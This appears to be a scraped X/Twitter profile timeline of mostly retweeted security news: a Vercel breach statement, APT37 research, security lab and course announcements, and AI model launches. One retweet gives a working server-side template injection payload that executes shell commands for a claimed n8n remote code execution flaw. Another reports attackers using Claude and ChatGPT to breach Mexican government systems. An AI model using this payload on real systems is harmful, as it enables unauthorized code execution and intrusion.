spacemoth

898 posts

spacemoth banner
spacemoth

spacemoth

@_spacemoth

https://t.co/rZY4BbgWrj https://t.co/Bu97j1XONG https://t.co/ehvpjvCEXx

/dev/null Присоединился Ekim 2009
72 Подписки244 Подписчики
spacemoth ретвитнул
Guillermo Rauch
Guillermo Rauch@rauchg·
Here's my update to the broader community about the ongoing incident investigation. I want to give you the rundown of the situation directly. A Vercel employee got compromised via the breach of an AI platform customer called Context.ai that he was using. The details are being fully investigated. Through a series of maneuvers that escalated from our colleague’s compromised Vercel Google Workspace account, the attacker got further access to Vercel environments. Vercel stores all customer environment variables fully encrypted at rest. We have numerous defense-in-depth mechanisms to protect core systems and customer data. We do have a capability however to designate environment variables as “non-sensitive”. Unfortunately, the attacker got further access through their enumeration. We believe the attacking group to be highly sophisticated and, I strongly suspect, significantly accelerated by AI. They moved with surprising velocity and in-depth understanding of Vercel. At the moment, we believe the number of customers with security impact to be quite limited. We’ve reached out with utmost priority to the ones we have concerns about. All of our focus right now is on investigation, communication to customers, enhancement of security measures, and sanitization of our environments. We’ve deployed extensive protection measures and monitoring. We’ve analyzed our supply chain, ensuring Next.js, Turbopack, and our many open source projects remain safe for our community. The recommendation for all Vercel customers is to follow the Security Bulletin closely (vercel.com/kb/bulletin/ve…). My advice to everyone is to follow the best practices of security response: secret rotation, monitoring access to your Vercel environments and linked services, and ensuring the proper use of the sensitive env variables feature. In response to this, and to aid in the improvement of all of our customers’ security postures, we’ve already rolled out new capabilities in the dashboard, including an overview page of environment variables, and a better user interface for sensitive env var creation and management. As always, I’m totally open to your feedback. We’re working with elite cybersecurity firms, industry peers, and law enforcement. We’ve reached out to Context to assist in understanding the full scale of the incident, in an effort to protect other organizations and the broader internet. I also want to thank the Google Mandiant team for their active engagement and assistance. It’s my mission to turn this attack into the most formidable security response imaginable. It’s always been a top priority for me. Vercel employs some of the most dedicated security researchers and security-minded engineers in the world. I commit to keeping you updated and rolling out extensive improvements and defenses so you, our customers and community, can have the peace of mind that Vercel always has your back.
English
448
1K
7.2K
2.6M
spacemoth ретвитнул
Vercel
Vercel@vercel·
We’ve identified a security incident that involved unauthorized access to certain internal Vercel systems, impacting a limited subset of customers. Please see our security bulletin: vercel.com/kb/bulletin/ve…
English
694
2.4K
8.8K
10.5M
spacemoth ретвитнул
Claude
Claude@claudeai·
Introducing Claude Opus 4.7, our most capable Opus model yet. It handles long-running tasks with more rigor, follows instructions more precisely, and verifies its own outputs before reporting back. You can hand off your hardest work with less supervision.
Claude tweet media
English
4.8K
10.3K
81.2K
13.6M
spacemoth ретвитнул
NullSecurityX
NullSecurityX@NullSecurityX·
Zero Click Unauthenticated RCE in n8n (CVE-2026-27493) The chain exploitation method is: Allow User input SSTI exploitation e.g. {{7*7}} ={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id ").toString()')()}}
English
7
83
479
36.3K
spacemoth ретвитнул
Virus Bulletin
Virus Bulletin@virusbtn·
Genians Security Center uncovers an APT37 campaign that used social networking as an initial access vector. Two Facebook accounts set to North Korea-linked locations were used to screen targets, build trust, and move conversations to Messenger. genians.co.kr/en/blog/threat…
Virus Bulletin tweet media
English
0
20
135
95.5K
spacemoth ретвитнул
vx-underground
vx-underground@vxunderground·
Hi I've added another 550,000+ malwares to the malware library. Please download the malware and share it with your friends and family. vx-underground.org/Updates
English
59
100
2K
67.2K
spacemoth ретвитнул
vx-underground
vx-underground@vxunderground·
Chat, I've changed my mind. We have some problems in the AI department. It turns out someone compromised the Mexican government to an unbelievable extent using nothing but Claude and ChatGPT. I'll link the full paper in the subsequent post. However, here is the highlights of how an unknown Threat Actor "vibe hacked" the Mexico government. Data stolen from... 1. SAT (Servicio de Administracion Tributaria) - Federal tax authority: - 195 million taxpayer records - 52 million directory records 2. Estado de Mexico - State government: - 15.5M vehicle registry records - 3.6M property owner records 3. Registro Civil de CDMX - Mexico City civil registry: - 220M civil records 4. Jalisco state government: - 50K patient records - 17K domestic violence victim records - 36K healthcare employee records - 180K digital government records 5. INE (Instituto Nacional Electoral) - National electoral institute: - 13.8K voter card records 6. Michoacan state government: - 2.28M property records - 2K user accounts with plaintext passwords 7. SADM Monterrey (Agua y Drenaje) Municipal water utility: - 3.5K procurement and vendor records - 5K procurement bid records
English
86
239
2.2K
338K
spacemoth ретвитнул
vx-underground
vx-underground@vxunderground·
CPU-Z and HWMonitor nerd (@d0cTB) put out a statement. Compromise was present for approx. 6 hours. This is an extremely short period of time. Also, extremely fast response by the nerds at cpuid.
vx-underground tweet media
English
16
103
1.1K
54.7K
spacemoth ретвитнул
Anthropic
Anthropic@AnthropicAI·
Introducing Project Glasswing: an urgent initiative to help secure the world’s most critical software. It’s powered by our newest frontier model, Claude Mythos Preview, which can find software vulnerabilities better than all but the most skilled humans. anthropic.com/glasswing
English
2K
6.7K
44.1K
30.9M
spacemoth
spacemoth@_spacemoth·
ls /Library/Caches/com.apple.act.mond
English
0
0
0
82
spacemoth ретвитнул
OffSec
OffSec@offsectraining·
The OSAI+ syllabus is finally here! Every module includes hands-on labs designed to mirror how real AI systems are built, integrated, and attacked in production environments ⚔️ And if you haven't already heard: OSAI+ is available now in pre-sale, with an exclusive pre-release offer on our [Extended] Course & Certification Bundle. Get 120 days of course + lab access for the price of 90 for a limited time only. Offer ends March 30 when bundle returns to 90 days of access. 💸 Purchase through pre-sale: portal.offsec.com/checkout/produ… 🔍 Learn more: offsec.com/courses/OSAI/
OffSec tweet mediaOffSec tweet mediaOffSec tweet mediaOffSec tweet media
English
9
38
289
23.5K
spacemoth ретвитнул
Mayfly
Mayfly@M4yFly·
🔥🐉 New GOAD Lab: DRACARYS I’ve just released a new free lab environment on GOAD: DRACARYS. The challenge includes 3 VMs and the objective is simple: Start with no authentication and work your way up to Domain Admin. Have fun exploiting it! 🔥🐉 mayfly277.github.io/posts/Dracarys…
English
10
99
292
17.1K
spacemoth ретвитнул
The Tor Project
The Tor Project@torproject·
The web’s security model has long relied on trusting the server. WEBCAT is an attempt to change that. Please help test it if you can. Your feedback at this early stage of development is extremely valuable. Excited to collaborate with @FreedomofPress & @SecureDrop
SecureDrop@SecureDrop

Web applications are only as trustworthy as their servers, and servers can get hacked. Introducing WEBCAT: it lets web browsers verify the origin of code before it runs. 🌞 Today, WEBCAT enters alpha testing! If you like to experiment with cutting-edge software, give it a try:

English
5
69
363
28K
spacemoth ретвитнул
Kali Linux
Kali Linux@kalilinux·
Kali & LLM: macOS with Claude Desktop GUI & Anthropic Sonnet LLM: This post will focus on an alternative method of using Kali Linux, moving beyond direct terminal command execution. Instead, we will leverage a Large Language Model (LLM) to translate… kali.org/blog/kali-llm-…
Kali Linux tweet media
English
103
510
3K
786.7K